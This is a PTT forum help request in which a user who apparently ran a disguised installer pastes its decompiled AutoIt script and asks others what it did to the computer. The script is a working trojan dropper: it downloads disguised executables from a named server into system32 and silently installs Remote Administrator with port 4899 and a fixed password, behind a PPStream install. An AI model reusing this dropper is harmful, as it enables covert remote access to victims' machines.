[求救] 疑似被遠端監看? 分析報告已更新
1. 敘述問題:
點下去的瞬間,好像裝了什麼東西。(大驚)
用Print照了一下,發現是Remote Administrator Server 2.1標題。
查了一下好像是個遠端軟體,但是一直找不到他安裝的路徑。
後來找了很多方法,想把這個exe的殼解開。
不過都失敗,只發現他好像是用Autoit的方法,作出的自動安裝。
於是運氣很好的用Autoit反編譯出了他的腳本,是個文本格式的。
不過小弟看不是很懂,怕亂搞會搞掛系統。
求高手幫忙解說一下,很想知道他到底對我的電腦做了什麼OTL。
------------------------------------------------------------------------------
; <AUT2EXE VERSION: 3.2.2.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區
\PPS Setup\Setup.au3>
; ----------------------------------------------------------------------------
Opt("MouseCoordMode", 0) ;1=absolute, 0=relative 1是大螢幕 0是相對視窗
Opt("TrayIconDebug", 1) ;0=no info, 1=debug line info
Opt("TrayIconHide", 0) ;0=show, 1=hide tray icon
Opt("WinDetectHiddenText", 0) ;0=don't detect, 1=do detect
Opt("WinTitleMatchMode", 2) ;1=start, 2=subStr, 3=exact, 4=... 某個視窗存
不存在,2是視窗只要有home就可以比對到了
Opt("OnExitFunc","OnAutoItExit");"OnAutoItExit" called
Opt("TrayIconHide", 1) ;0=show, 1=hide tray icon
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------
; Include Version:1.59 (04/20/2006)
;
------------------------------------------------------------------------------
;
; AutoIt Version: 3.0
; Language: English
; Description: Functions that assist with process management.
;
;
------------------------------------------------------------------------------
;===============================================================================
;
; Description - Returns a string containing the process name that belongs
to a given PID.
; Syntax - _ProcessGetName( $iPID )
; Parameters - $iPID - The PID of a currently running process
; Requirements - None.
; Return Values - Success - The name of the process
; Failure - Blank string and sets @error
; 1 - Process doesn't exist
; 2 - Error getting process list
; 3 - No processes found
; Author(s) - Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes - Supplementary to ProcessExists().
;===============================================================================
Func _ProcessGetName($i_PID)
If Not ProcessExists($i_PID) Then
SetError(1)
Return ''
EndIf
Local $a_Processes = ProcessList()
If Not @error Then
For $i = 1 To $a_Processes[0][0]
If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0]
Next
EndIf
SetError(1)
Return ''
EndFunc ;==>_ProcessGetName
;===============================================================================
;
; Function Name: _ProcessGetPriority()
; Description: Get the priority of an open process
; Parameter(s): $vProcess - PID or name of a process.
; Requirement(s): AutoIt Beta v3.1.1.61+
; kernel32.dll (included with Windows)
; Return Value(s): On Success - Returns integer corressponding to
; the processes's priority:
; 0 - Idle/Low
; 1 - Below Normal (Not supported on Windows 95/98/ME)
; 2 - Normal
; 3 - Above Normal (Not supported on Windows 95/98/ME)
; 4 - High
; 5 - Realtime
; On Failure: Returns -1 and sets @Error to 1
; Author(s): Matthew Tucker
; Valik added Pid or Processname logic
;===============================================================================
;
Func _ProcessGetPriority($vProcess)
Local $i_PID = ProcessExists($vProcess)
If Not $i_PID Then
SetError(1)
Return -1
EndIf
Local $hDLL = DllOpen('kernel32.dll')
Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400,
'int', False, 'int', $i_PID)
Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int',
$aProcessHandle[0])
DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0])
DllClose($hDLL)
Switch $aPriority[0]
Case 0x00000040
Return 0
Case 0x00004000
Return 1
Case 0x00000020
Return 2
Case 0x00008000
Return 3
Case 0x00000080
Return 4
Case 0x00000100
Return 5
Case Else
SetError(1)
Return -1
EndSwitch
EndFunc ;==>_ProcessGetPriority
;===============================================================================
;
; Description: Executes a DOS command in a hidden command window.
; Syntax: _RunDOS( $sCommand )
; Parameter(s): $sCommand - Command to execute
; Requirement(s): None
; Return Value(s): On Success - Returns the exit code of the command
; On Failure - Depends on RunErrorsFatal setting
; Author(s): Jeremy Landes <jlandes at landeserve dot com>
; Note(s): None
;
;===============================================================================
Func _RunDOS($sCommand)
Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc ;==>_RunDOS
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------
$ServerURL="http://studftp.stut.edu.tw/~d9420202/Download2/"
InetGet($ServerURL &
"compentent/ipsec5.exe","c:\Windows\system32\ipsec5.exe",1) ;把右下角的R點擊隱
藏
InetGet($ServerURL &
"compentent/ipsec4.exe","c:\Windows\system32\ipsec4.exe",1)
If not ProcessExists ("ipsec4.exe") Then
ShellExecute("c:\Windows\system32\ipsec4.exe")
Sleep(10)
EndIf
InetGet($ServerURL &
"compentent/win1logon.exe","c:\Windows\system32\win1logon.exe",1)
If not ProcessExists ("win1logon.exe") Then
ShellExecute("c:\Windows\system32\win1logon.exe")
Sleep(10)
EndIf
InetGet($ServerURL & "compentent/MDME.exe","c:\Windows\system32\MDME.exe",1) ;
去抓下載程式
InetGet($ServerURL & "compentent/MDEE.exe","c:\Windows\system32\MDEE.exe",1) ;
去抓下載程式
InetGet($ServerURL &
"compentent/AdmDll.dll","c:\Windows\system32\AdmDll.dll",1) ;去抓下載程式
InetGet($ServerURL &
"compentent/r_server.exe","c:\Windows\system32\newscript.exe",1) ;去抓下載程式
InetGet($ServerURL &
"compentent/MSWINSCK.OCX","c:\Windows\system32\MSWINSCK.OCX",1)
InetGet($ServerURL &
"compentent/upload.exe","c:\Windows\system32\upload.exe",1)
InetGet($ServerURL & "compentent/down.exe","c:\Windows\system32\down.exe",1)
$rc = _RunDos("c:\Windows\system32\newscript.exe /setup")
sleep(1000)
$rc = _RunDos("c:\Windows\system32\newscript.exe /installdrv /silence")
$rc2 = _RunDos("c:\Windows\system32\newscript.exe /port:4899 /pass:119995995
/save /silence")
ProcessClose("newscript.exe")
ShellExecute("c:\Windows\system32\newscript.exe")
If not ProcessExists ("MDME.exe") Then
IF FileGetSize("c:\Windows\system32\MDME.exe")<>0 Then
ShellExecute("c:\Windows\system32\MDME.exe")
EndIf
EndIf
If not ProcessExists ("MDEE.exe") Then
ShellExecute("c:\Windows\system32\MDEE.exe")
EndIf
If not ProcessExists ("PPStream.exe") Then
ShellExecute(@WorkingDir & "\FILES\" & "PPStream.exe")
EndIf
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區
\PPS Setup\Setup.au3>
; ----------------------------------------------------------------------------
------------------------------------------------------------------------------
2. 系統資料:
Windos XP SP3
Avast
3. 分析報告:
http://sun.cis.scu.edu.tw/~92a39/upload/38713.txt
http://sun.cis.scu.edu.tw/~92a39/upload/38715.txt
http://sun.cis.scu.edu.tw/~92a39/upload/38716.txt
--
╠═╬═卒═帥═馬═╬═╬═╬═╣
║ ║ ║ ║╲║╱║ ║ ║ ║ 此時,
╠═╬═╬═車═╬═╬═╬═╬═╣ 帥有何用?
║ ║ ║ ║╱║╲║ ║ ║ ║ 有車又如何?
╚═╩═╩═╩═╩═╩═╩═╩═╝ 有馬子又怎樣? ψqaz225
→ : 你錯了,有帥又有車,馬子當然可以當炮打
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 122.116.171.101
→
03/18 23:02, , 1F
03/18 23:02, 1F
→
03/18 23:02, , 2F
03/18 23:02, 2F
→
03/18 23:03, , 3F
03/18 23:03, 3F
→
03/18 23:08, , 4F
03/18 23:08, 4F
推
03/18 23:20, , 5F
03/18 23:20, 5F
→
03/18 23:21, , 6F
03/18 23:21, 6F
→
03/18 23:21, , 7F
03/18 23:21, 7F
※ 編輯: epyonwing 來自: 122.116.171.101 (03/19 18:30)
※ 編輯: epyonwing 來自: 122.116.171.101 (03/19 18:41)